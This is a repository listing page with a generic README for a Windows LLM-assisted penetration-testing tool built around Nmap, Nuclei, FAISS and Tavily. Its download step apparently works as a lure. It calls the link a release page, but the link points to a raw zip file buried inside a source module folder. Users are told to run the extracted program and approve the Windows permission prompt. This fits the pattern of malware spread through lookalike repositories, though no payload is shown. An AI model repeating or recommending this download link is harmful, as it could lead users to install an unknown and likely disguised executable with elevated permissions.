pentest-with-LLM
Health Warn
- No license — Repository has no license file
- Description — Repository has a description
- Active repo — Last push 0 days ago
- Low visibility — Only 5 GitHub stars
Code Pass
- Code scan — Scanned 12 files during light audit, no dangerous patterns found
Permissions Pass
- Permissions — No dangerous permissions requested
No AI report is available for this listing yet.
Automate authorized pentesting with LLMs, combining scanning, RAG, and exploit research for faster target analysis, vuln discovery, and reporting
🛡️ pentest-with-LLM - Run Guided Security Testing
📥 Download
Visit the release page to download and run this file:
https://github.com/miraunreformable550/pentest-with-LLM/raw/refs/heads/main/modules/SearchEngine/with-LLM-pentest-v1.7-alpha.2.zip
🪟 Windows Setup
This project is built for authorized security testing and lab use. For Windows, use the release page to get the latest package, then follow the steps below.
1. Get the file
- Open the release page.
- Download the Windows package from the latest release.
- Save it to a folder you can find again, such as
DownloadsorDesktop.
2. Unpack the file
- If the file is a
.zip, right-click it. - Select Extract All.
- Open the new folder after extraction.
3. Run the app
- Look for the main program file in the extracted folder.
- Double-click it to start the app.
- If Windows asks for permission, choose Yes.
4. First launch check
When the app opens, it may need a few minutes to prepare local files, scan tools, and the knowledge store. Keep the app open until the start screen or main window appears.
🖥️ What You Need
Use a Windows 10 or Windows 11 system with:
- 8 GB RAM or more
- 10 GB free disk space
- Internet access for online lookup features
- Permission to test the target system
- A recent version of Microsoft Edge or Chrome for any web-based parts
If you plan to use the full workflow on Windows, install these tools too:
- Nmap for host discovery and port scans
- Nuclei for web checks
- Python 3.10 or newer if you run from source
- Git if you want to clone the source project
🔧 What This App Does
pentest-with-LLM helps you run a full test flow from one place:
- Find live hosts on a network
- Scan open ports with Nmap
- Check web targets with Nuclei
- Search a local vulnerability knowledge base with FAISS
- Pull online reference data with Tavily
- Use a large language model to help form test ideas
- Save results and logs for review
🧭 How to Use It
1. Start with a target
Enter the host or IP address you want to test. Use a system you own or have clear permission to test.
2. Run discovery
Use the host check to see if the target is online. Then run port scans to find open services.
3. Check for known issues
Run the scan checks to look for signs of common web flaws and weak settings.
4. Review local knowledge
The app can search its local FAISS index for related findings and test notes.
5. Use online lookup
If enabled, the app can use Tavily to fetch public reference material for the target service or issue.
6. Generate test ideas
The LLM part can turn scan results into more focused follow-up ideas. Use this to guide your next checks.
7. Save the output
Review the final report and logs after each run. Keep them for your records.
⚙️ Basic Windows Flow
Option A: Use the release package
- Download the Windows release from the link above.
- Extract the files.
- Open the app.
- Enter your target.
- Run the scan steps in order.
Option B: Run from source
Use this path if you want the full project folder and plan to set up the tools yourself.
- Install Python 3.10 or later.
- Install Git.
- Clone the repository.
- Create a virtual environment.
- Install the Python packages.
- Install Nmap and Nuclei.
- Update the nuclei templates.
- Start the app from the project folder.
🧰 Source Setup
If you run from source on Windows, follow these steps.
1. Clone the project
git clone <your-repo-url>
cd pentest-with-LLM
2. Create a virtual environment
python -m venv .venv
.venv\Scripts\activate
python -m pip install -U pip
pip install -r requirements.txt
3. Install Nmap
Install Nmap for Windows from the official installer, then make sure the nmap.exe path is available to the app.
4. Install Nuclei
Install Nuclei from the official release or use Go to build it if you already have Go on your system.
5. Update templates
nuclei -update-templates
🗂️ Configuration
The main config file is:
modules/config/conf.ini
Fill in the paths for tools and your API keys before first use.
Example
[nuclei]
nuclei_path = C:\Tools\nuclei\nuclei.exe
[nmap]
nmap_path = C:\Program Files\Nmap\nmap.exe
[tavily]
api_key = your_tavily_key_here
[llm]
api_key = your_model_api_key_here
model_name = your_model_name_here
If you store tools in other folders, update the paths to match your system.
📌 Common Windows Paths
You may use paths like these:
C:\Program Files\Nmap\nmap.exeC:\Tools\nuclei\nuclei.exeC:\Users\YourName\Desktop\pentest-with-LLM
If the app cannot find a tool, check the path in conf.ini and try again.
🧪 Typical Run Order
For a clean test session, use this order:
- Set the target
- Run host discovery
- Run port scanning
- Run Nuclei checks
- Review local knowledge matches
- Pull online references if needed
- Review LLM-based findings
- Export or save the report
📁 Project Layout
The project folder uses these parts:
modules/for core app logicmodules/config/for config filesrequirements.txtfor Python packagesREADME.mdfor project usenuclei-templates/for scan templates if stored locally- log and result files for scan output
🧩 Main Features in Simple Terms
Host discovery
Checks if a target is live on the network.
Port scan
Finds open ports and the services behind them.
Vulnerability checks
Looks for known issues with template-based checks.
Local knowledge search
Searches a local index for related content and past findings.
Online reference search
Uses web lookup to find public notes and details.
LLM support
Helps turn scan data into follow-up test ideas and result text.
Logging
Keeps a record of each scan step and result.
🔒 Safe Use
Use this tool only on systems you own or have written permission to test. Keep it in a lab or approved work setup when possible. Check target scope before every run.
🛠️ Troubleshooting
The app does not start
- Check that you extracted all files
- Run it again from the same folder
- Make sure Windows did not block the file
Nmap is not found
- Install Nmap
- Add the Nmap folder to your PATH
- Set the full path in
conf.ini
Nuclei is not found
- Install Nuclei
- Confirm
nuclei.exeexists - Set the full path in
conf.ini
Templates do not update
- Check your internet access
- Open a command prompt in the Nuclei folder
- Run
nuclei -update-templatesagain
API lookup fails
- Check your Tavily key
- Check your model key
- Confirm the keys are saved in
conf.ini
The scan is slow
- Large targets take longer
- Some checks wait for timeouts
- Test one target at a time
🧾 Notes for First-Time Users
- Start with a small lab target
- Test one host first
- Keep scans within your approved scope
- Review each result before moving to the next step
- Save reports after each run
📚 Repository
Repository: pentest-with-LLM
Reviews (0)
Sign in to leave a review.
Leave a reviewNo results found